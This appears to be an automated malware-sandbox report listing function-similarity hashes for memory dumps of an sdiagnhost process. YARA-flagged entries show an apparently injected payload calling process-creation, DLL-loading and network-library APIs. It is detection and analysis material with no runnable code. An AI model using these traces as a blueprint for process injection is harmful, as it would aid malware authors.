Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: d17bc5aa3dd7e54eec5516a6c5c435293f8a0a3273461d2b525cc6169d948a43
• Instruction ID: bf6bef071badcf492e671d79d9983e29ac5f8e98d8036433b5366f910c11260c
• Opcode Fuzzy Hash: d17bc5aa3dd7e54eec5516a6c5c435293f8a0a3273461d2b525cc6169d948a43
• Instruction Fuzzy Hash: 9690023120141412F5007598550964A00058FF0305F95D112A5025555ECB69D9916131
APIs
Memory Dump Source
• Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
• Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: ecb080a907fad0d90a8e358c87f1f253d5a789751ab2e1b05f38414fc8e7e5b7
• Instruction ID: 4f682c60fde7e05f6745397a91c25ce55981efb1ccff730a9ca8b994b99373a3
• Opcode Fuzzy Hash: ecb080a907fad0d90a8e358c87f1f253d5a789751ab2e1b05f38414fc8e7e5b7
• Instruction Fuzzy Hash: 8390022921341012F5807158550960E00058FE1206FD5D516A0016558CCE19D9695321
APIs
Memory Dump Source
• Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
• Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: db36c71a7799e2d2524a91819fac7bf7434d1f775bb789c94a065317ed63fc99
• Instruction ID: 526d3332876517f54c9fb4c868436a88816cddaa250e2f3bb57cdd392e30da48
• Opcode Fuzzy Hash: db36c71a7799e2d2524a91819fac7bf7434d1f775bb789c94a065317ed63fc99
• Instruction Fuzzy Hash: 7C90022130141013F5407158551960A4005DFF1305F95D112E0415554CDE19D9565222
APIs
Memory Dump Source
• Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
• Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: c434979a61596b87e16182137c81e4f24c0e5941e1a0e4da4d2ae4e680cb72c4
• Instruction ID: 4b0e7cbeece36ce788c5691b3fd7e76d865f471f224e5aac346c2449ba1c654d
• Opcode Fuzzy Hash: c434979a61596b87e16182137c81e4f24c0e5941e1a0e4da4d2ae4e680cb72c4
• Instruction Fuzzy Hash: 65900221242451627945B158450550B40069FF02457D5C113A1415950C8A2AE956D621
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 8ae5b3966fc4e43411f64a89f811720c27e60bd352a86d7d63ff36f6b6e049f6
                                                                                                        • Instruction ID: 022df304f9a49f4ddbd21884ccbfae04d0468a21df3d815acbc5ae09d79c12f0
                                                                                                        • Opcode Fuzzy Hash: 8ae5b3966fc4e43411f64a89f811720c27e60bd352a86d7d63ff36f6b6e049f6
                                                                                                        • Instruction Fuzzy Hash: 4A90023120141423F5117158460570B00098FE0245FD5C513A0425558D9B5ADA52A121
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 7f427cebfe7d96784d1400a58c2186752cb4d129f41b59a15c5dc928bef9fa4e
                                                                                                        • Instruction ID: c49ba6e3942b19a9a058b624255b03cf160e532e3aa789054fdabed8eb02c5a5
                                                                                                        • Opcode Fuzzy Hash: 7f427cebfe7d96784d1400a58c2186752cb4d129f41b59a15c5dc928bef9fa4e
                                                                                                        • Instruction Fuzzy Hash: E690026120181413F5407558490560B00058FE0306F95C112A2065555E8F2DDD516135
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 1b7c2fdbeefebc3ca14197c0e75538cbc2045c2cf63a0e83fbf9951521fa6708
                                                                                                        • Instruction ID: 95921e1347b3bf16acfec4990127db2dba9f2cc2ce1aceac7f906e91c2ee2a35
                                                                                                        • Opcode Fuzzy Hash: 1b7c2fdbeefebc3ca14197c0e75538cbc2045c2cf63a0e83fbf9951521fa6708
                                                                                                        • Instruction Fuzzy Hash: 5790022160141512F5017158450561A000A8FE0245FD5C123A1025555ECF29DA92A131
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 75f3a7331727aac5be3193a66e3588dd9b348ce14136546404e8c58e71731bb5
                                                                                                        • Instruction ID: 47434c7c4f29c024c3b2d3b9c2fd164fb63fd92122b827aa056709a98822569e
                                                                                                        • Opcode Fuzzy Hash: 75f3a7331727aac5be3193a66e3588dd9b348ce14136546404e8c58e71731bb5
                                                                                                        • Instruction Fuzzy Hash: 4990026134141452F50071584515B0A0005CFF1305F95C116E1065554D8B1DDD526126
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 381ea4bcfa3e78ea90fbccf9f8fce7bc95cc47b0c1cb7b032914be4ab03a4689
                                                                                                        • Instruction ID: 8699d9e661e67cec75ed43d18f68003623be6e519a1a020cb07011a97a6b6ba7
                                                                                                        • Opcode Fuzzy Hash: 381ea4bcfa3e78ea90fbccf9f8fce7bc95cc47b0c1cb7b032914be4ab03a4689
                                                                                                        • Instruction Fuzzy Hash: D4900221211C1052F60075684D15B0B00058FE0307F95C216A0155554CCE19D9615521
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: afbf96c5aef9dbb681d91f17850c71f9bf367d04fbd7ee5c24b0316eecbb5c01
                                                                                                        • Instruction ID: 3e99251204f44ef2285eff2d6a80109268f16406add8fe3068f6b1b5939f0c88
                                                                                                        • Opcode Fuzzy Hash: afbf96c5aef9dbb681d91f17850c71f9bf367d04fbd7ee5c24b0316eecbb5c01
                                                                                                        • Instruction Fuzzy Hash: 619002216014105265407168894590A4005AFF1215795C222A0999550D8A5DD9655665
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 9312c9c5c738193f6c59a16a0aa1f240babf2cc87f65e6117fd928d961be2980
                                                                                                        • Instruction ID: d6ff5f2f3d7dce4b8d13148a3411f3ac7de952b9d868ee6e78ecde3505f28ed3
                                                                                                        • Opcode Fuzzy Hash: 9312c9c5c738193f6c59a16a0aa1f240babf2cc87f65e6117fd928d961be2980
                                                                                                        • Instruction Fuzzy Hash: A2900225211410132505B558070550B00468FE5355395C122F1016550CDB25D9615121
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 89de938099719114b93f9357ca8b2a5b9f3e64f0471d1fdd3997a2671566cd42
                                                                                                        • Instruction ID: 9ce91bee272c78f91dab633b17325fad95311e53551560d334544588b1ef5b29
                                                                                                        • Opcode Fuzzy Hash: 89de938099719114b93f9357ca8b2a5b9f3e64f0471d1fdd3997a2671566cd42
                                                                                                        • Instruction Fuzzy Hash: 7E900225221410122545B558070550F04459FE63553D5C116F1417590CCB25D9655321
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 5de253dcd43f899fa7dd1fb1955bdec52e3db48be8645e93940dc998c8b16235
                                                                                                        • Instruction ID: 881de2629c20ca10a754cb94d08576d11d7416b5a67aae4366883f7eaeef4e3f
                                                                                                        • Opcode Fuzzy Hash: 5de253dcd43f899fa7dd1fb1955bdec52e3db48be8645e93940dc998c8b16235
                                                                                                        • Instruction Fuzzy Hash: 949002612024101365057158451561A400A8FF0205B95C122E1015590DCA29D9916125
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: b09348266ad7be170c1bae853a2804d57b52e419b00e0b3c432ce91c798f172e
                                                                                                        • Instruction ID: 6c16ba8f8be75ab3379423718d9b529156f5ccc32073dd3b221c17669ac4c07b
                                                                                                        • Opcode Fuzzy Hash: b09348266ad7be170c1bae853a2804d57b52e419b00e0b3c432ce91c798f172e
                                                                                                        • Instruction Fuzzy Hash: 6990023120545852F54071584505A4A00158FE0309F95C112A0065694D9B29DE55B661
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 64d58c53a9ce4a2e7cbe6e29ae20f3c66c5956c1bea0ba0ef9d26309a3899baa
                                                                                                        • Instruction ID: bd923c9595f8777356b232bb7e62f0c8e3841189eb955924c29384c33cb9ef8e
                                                                                                        • Opcode Fuzzy Hash: 64d58c53a9ce4a2e7cbe6e29ae20f3c66c5956c1bea0ba0ef9d26309a3899baa
                                                                                                        • Instruction Fuzzy Hash: B690023120141812F5807158450564E00058FE1305FD5C116A0026654DCF19DB5977A1
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
• Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 02fcd7834b6a02c65ad86bc147ca12643bc78e7437a6b73e81f7ea5b05c9439d
                                                                                                        • Instruction ID: 7b17320c2ad493652ad1d663e4b3e1fa01d821048e4e5b437801707783aea1ea
                                                                                                        • Opcode Fuzzy Hash: 02fcd7834b6a02c65ad86bc147ca12643bc78e7437a6b73e81f7ea5b05c9439d
                                                                                                        • Instruction Fuzzy Hash: 1490023160541812F5507158451574A00058FE0305F95C112A0025654D8B59DB5576A1
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
• Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 14cbc8ffd60c2677136d857e0766bc94b7119ab23c9ef454a9a585f3578a17c4
                                                                                                        • Instruction ID: ee9e18717a0a754e746fa092c424c3a7aa6a3ac7f43d4f2fd9d4248ef15bc76f
                                                                                                        • Opcode Fuzzy Hash: 14cbc8ffd60c2677136d857e0766bc94b7119ab23c9ef454a9a585f3578a17c4
                                                                                                        • Instruction Fuzzy Hash: C890023160551412F5007158461570A10058FE0205FA5C512A0425568D8B99DA5165A2
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
• Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 59ca135df3e8a5c428608ff5fed071df99823e7ed1e575a7f56b994645442eb3
                                                                                                        • Instruction ID: e1202ede455c4a9e5cc0071714ccbf84320ad0135a2bb4f91d4259666d1d4e32
                                                                                                        • Opcode Fuzzy Hash: 59ca135df3e8a5c428608ff5fed071df99823e7ed1e575a7f56b994645442eb3
                                                                                                        • Instruction Fuzzy Hash: 0F90022124546112F550715C450561A4005AFF0205F95C122A0815594D8A59D9556221
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                        • API String ID: 0-1269752229
                                                                                                        • Opcode ID: 93ed7fc7e8a2b929edb06d7e28c53e65dc06e661661fd9ebe2acb2946e254777
                                                                                                        • Instruction ID: 02c273c275e0fb4b5a4390f76cf18945027d891d6238105132adb8d53303c483
                                                                                                        • Opcode Fuzzy Hash: 93ed7fc7e8a2b929edb06d7e28c53e65dc06e661661fd9ebe2acb2946e254777
                                                                                                        • Instruction Fuzzy Hash: 7581AD72608282AFC716DF78C881AE6BFB4EF41714B14429BD8A59B342D3709B02CBD5
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 001D3BFB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Sleep
                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                        • Opcode ID: 43ebc964fe30ff28384a1a0b1adcacce20940306f4784d9d2e59690fea1f200a
                                                                                                        • Instruction ID: 926f4eece92bdc7cf469646f6e5b97f2419d90f3c9e3bb527435c28922be0fe5
                                                                                                        • Opcode Fuzzy Hash: 43ebc964fe30ff28384a1a0b1adcacce20940306f4784d9d2e59690fea1f200a
                                                                                                        • Instruction Fuzzy Hash: 4D318EB1A40205BFD714DFA4C885FEBBBB8FF84314F00422AE5596B241D374AA41CBA6
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InitializeUninitialize
                                                                                                        • String ID: @J7<
                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                        • Opcode ID: 4ea83eec36419e3038a8aba88117c06a8ab2a6239cd382fe41852ed4661598b2
                                                                                                        • Instruction ID: c077d220b7bb507f1c38176d354c4b0f39cdc95c799a139ca4c2c25fb34c0b9c
                                                                                                        • Opcode Fuzzy Hash: 4ea83eec36419e3038a8aba88117c06a8ab2a6239cd382fe41852ed4661598b2
                                                                                                        • Instruction Fuzzy Hash: B33121B5A0060AAFDB00DFD8C880DEEB7B9FF88304B10855DE515E7214D775EE458BA0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InitializeUninitialize
                                                                                                        • String ID: @J7<
                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                        • Opcode ID: 78253a6a0592dd7ae61f6760372fbcc85cc96b5f70872e8765205b36e08a859d
                                                                                                        • Instruction ID: 234a990ff035de2e65c6dc2d8893eab5a8bb8f900866bee345ec016c3f7d32d2
                                                                                                        • Opcode Fuzzy Hash: 78253a6a0592dd7ae61f6760372fbcc85cc96b5f70872e8765205b36e08a859d
                                                                                                        • Instruction Fuzzy Hash: A6310FB6A0061AAFDB00DFD8D880DEEB7B9FF88304B10855DE515EB214D775EE458BA0
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 001C84BA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID: '
                                                                                                        • API String ID: 3188754299-1997036262
                                                                                                        • Opcode ID: 2e3dd970ceacec788b4ff9e5c72751df493943f6f272296c3c84728b920b7ba9
                                                                                                        • Instruction ID: 4a3a8bf1751851e9d301a0840fdee7eb4dc457ecaaba8effe1a0de5110bd9808
                                                                                                        • Opcode Fuzzy Hash: 2e3dd970ceacec788b4ff9e5c72751df493943f6f272296c3c84728b920b7ba9
                                                                                                        • Instruction Fuzzy Hash: 38E02621105A4B26E729127CACCDBBA3FCC4B67338F680F5CE8E6834D2D715D5036192
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 001C4772
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: a19501024b283509392f745f754d269db80abc42ff1895e438d2e3c58ecd0413
                                                                                                        • Instruction ID: 31d50476fdc016fb2ca517917f58c39b68e671c76f386af3246956abd3893d5b
                                                                                                        • Opcode Fuzzy Hash: a19501024b283509392f745f754d269db80abc42ff1895e438d2e3c58ecd0413
                                                                                                        • Instruction Fuzzy Hash: FE0121B5E0020DABDF10DBE4DD52FADB7789B64308F004199E90997241F771EB54CB91
                                                                                                        APIs
                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,00000010,?,00000010,00000258,?,?,00000044,00000258,00000010,001C8454,?,00000030,00000258,00000230), ref: 001D97D0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateInternalProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 2186235152-0
                                                                                                        • Opcode ID: 5b14e8c8991db2ce8bb60d16524bd967674bc5ee151f6c0ef3eec1d62ddbf45d
                                                                                                        • Instruction ID: c479944bdf4e514f182a9058c10d6b0b82996b2e4297cf8b52c09c292a20e2eb
                                                                                                        • Opcode Fuzzy Hash: 5b14e8c8991db2ce8bb60d16524bd967674bc5ee151f6c0ef3eec1d62ddbf45d
                                                                                                        • Instruction Fuzzy Hash: D601DDB2210508BBCB54DF98DC81EEB37ADEF8C750F418209FA19A3241D670F8418BA4
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 001C4772
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
